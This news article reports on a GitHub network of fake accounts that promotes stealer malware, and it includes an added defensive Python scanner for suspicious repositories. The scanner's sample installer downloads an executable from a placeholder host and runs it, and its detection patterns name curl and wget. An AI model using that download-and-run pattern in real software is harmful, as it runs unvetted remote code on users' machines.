A network of around 3,000 “ghost” accounts on GitHub has been found abusing the code-hosting platform to promote malware and phishing links. A recent investigation by cybersecurity firm Check Point uncovered the activities of a cybercriminal group that researchers have dubbed “Stargazer Goblin.”
Stargazer Goblin has been active on Microsoft-owned GitHub, the world’s largest open-source code repository, since at least June 2023, and possibly earlier. The site hosts millions of developers’ projects, and Stargazer Goblin has used GitHub’s own community features, such as starring and forking, to lend visibility and apparent legitimacy to its malicious code repositories.
Antonis Terefos, a malware reverse engineer at Check Point who discovered the network, highlighted the sophistication of the operation, noting that while GitHub has been targeted by cybercriminals before, the scale and method of this operation are unprecedented.
The repositories and stars are bought and sold through cybercrime-related Telegram channels and various criminal marketplaces. Telegram is commonly used by cybercriminals, their clients and their victims. Terefos said he has not previously seen a network of fake accounts of this kind operating on GitHub.
The network, which Check Point calls the Stargazers Ghost Network, distributes malware disguised as legitimate tools for social media, gaming and cryptocurrency applications, including purported VPN clients and license cracks for software such as Adobe Photoshop. These repositories target Windows users looking for free software online.
The network charges other hackers a fee for its services. Check Point identified various types of malware distributed through this network, including Atlantida Stealer, Rhadamanthys, and Lumma Stealer. Terefos discovered the network while investigating instances of Atlantida Stealer.
Stargazer Goblin advertises on cybercrime forums and has a Telegram channel offering 100 stars for $10 and 500 stars for $50. It also clones existing repositories and supplies established, trusted-looking accounts. According to Check Point’s research, the network may have earned up to $100,000 since it began these operations, possibly as early as August 2022. Between mid-May and mid-June 2024 alone, the operator reportedly made around $8,000.
Terefos has observed legitimate repositories being hijacked and converted into malicious repositories using stolen credentials. If legitimate users fork these compromised repositories, the malicious code can spread further. Automated tools help Terefos identify accounts linked to the network by recognizing common characteristics such as similar templates and tags.
When GitHub identifies accounts that support illegal malware campaigns, it disables the user accounts for violating GitHub’s terms of service. Alexis Wales, GitHub’s vice president of security operations, said the company has dedicated teams to detect and remove such content and accounts. These teams use a combination of manual review and large-scale detection using machine learning to identify suspicious behavior.
Unfortunately, with over 100 million users and 420 million repositories, GitHub is a huge target, and cybercriminals can hide within its user base like grains of sand on a beach.
Jake Moore, global cybersecurity advisor at security firm Eset, warned GitHub users about the risks of downloading malicious code, noting that signs of a malicious repository include unexpected code changes, code that accesses external resources, and hard-coded credentials or API keys.
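Moore’s indicators lend themselves to a quick triage pass before anything from an unfamiliar repository is run. The script below is an added example, not code from Check Point, Eset or GitHub: it walks a checkout (here a constructed in-memory one, a fake “FreeVPN” installer) and flags hard-coded credentials, calls to external hosts, and dynamic execution of fetched content. The regex patterns, the `allowed_hosts` list and the sample files are assumptions chosen for illustration, not part of any published research.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class Finding:
    path: str
    line: int
    category: str   # "secret", "network" or "execution"
    kind: str
    snippet: str


# Hard-coded credential shapes: two public token prefix formats plus a generic
# rule for KEY = "..." style assignments of at least 8 characters.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "generic_assignment": re.compile(
        r"(?i)\b(api[_-]?key|secret|password|token)\b\s*[:=]\s*['\"][^'\"]{8,}['\"]"),
}
# Code that reaches out to external resources.
NETWORK_PATTERNS = {
    "url_literal": re.compile(r"https?://[^\s'\"<>]+"),
    "http_call": re.compile(
        r"\b(requests\.(get|post)|urllib\.request\.urlopen|socket\.connect"
        r"|Invoke-WebRequest|curl\s|wget\s)"),
}
# Code that runs something built or fetched at runtime.
EXEC_PATTERNS = {
    "dynamic_exec": re.compile(
        r"\b(exec|eval|subprocess\.(Popen|run|call)|os\.system)\s*\("),
}


def scan_text(path, text, allowed_hosts=()):
    """Return findings for one file. URL literals whose host is in
    allowed_hosts (e.g. the project's own GitHub page) are not reported."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pat in SECRET_PATTERNS.items():
            if pat.search(line):
                findings.append(Finding(path, lineno, "secret", kind, line.strip()))
        for kind, pat in NETWORK_PATTERNS.items():
            m = pat.search(line)
            if m is None:
                continue
            if kind == "url_literal":
                host = urlparse(m.group(0)).hostname or ""
                if host in allowed_hosts:
                    continue
            findings.append(Finding(path, lineno, "network", kind, line.strip()))
        for kind, pat in EXEC_PATTERNS.items():
            if pat.search(line):
                findings.append(Finding(path, lineno, "execution", kind, line.strip()))
    return findings


def scan_repo(files, allowed_hosts=()):
    """files maps a relative path to its contents, as a directory walk would yield."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text, allowed_hosts))
    return findings


def summarize(findings):
    """Count findings per category, e.g. {"secret": 2, "network": 2, "execution": 1}."""
    counts = {}
    for f in findings:
        counts[f.category] = counts.get(f.category, 0) + 1
    return counts


# Constructed sample checkout: a "free VPN" repo whose installer pulls a binary
# from an outside host and runs it. Hosts, tokens and file names are made up.
SAMPLE_FILES = {
    "README.md": "# FreeVPN Pro\n\nRun `python setup.py` to install. "
                 "See https://github.com/example/freevpn\n",
    "setup.py": (
        "import urllib.request, subprocess\n"
        "API_KEY = 'sk-live-0123456789abcdef0123'\n"
        "GH_TOKEN = 'ghp_0123456789abcdefghijklmnopqrstuvwxyz'\n"
        "payload = urllib.request.urlopen('http://cdn.example.com/vpn_setup.exe').read()\n"
        "open('vpn_setup.exe', 'wb').write(payload)\n"
        "subprocess.run(['vpn_setup.exe'])\n"
    ),
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_FILES, allowed_hosts=("github.com",)):
        print(f"{f.path}:{f.line} [{f.category}/{f.kind}] {f.snippet}")
    print(summarize(scan_repo(SAMPLE_FILES, allowed_hosts=("github.com",))))
```

This is a triage aid, not a verdict: a clean scan proves nothing, since a stealer can be hidden in an obfuscated blob or a binary release asset, while a hit such as a download-then-execute chain in an installer deserves a manual look regardless of how many stars the repository shows. Run it against a fresh clone, not the rendered GitHub page, so that the scanned content is what will actually execute.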
The Stargazer Goblin network may reach beyond GitHub: YouTube accounts have been seen sharing its malicious links through their videos, and Terefos stresses that the full extent of the network’s activities is not yet understood.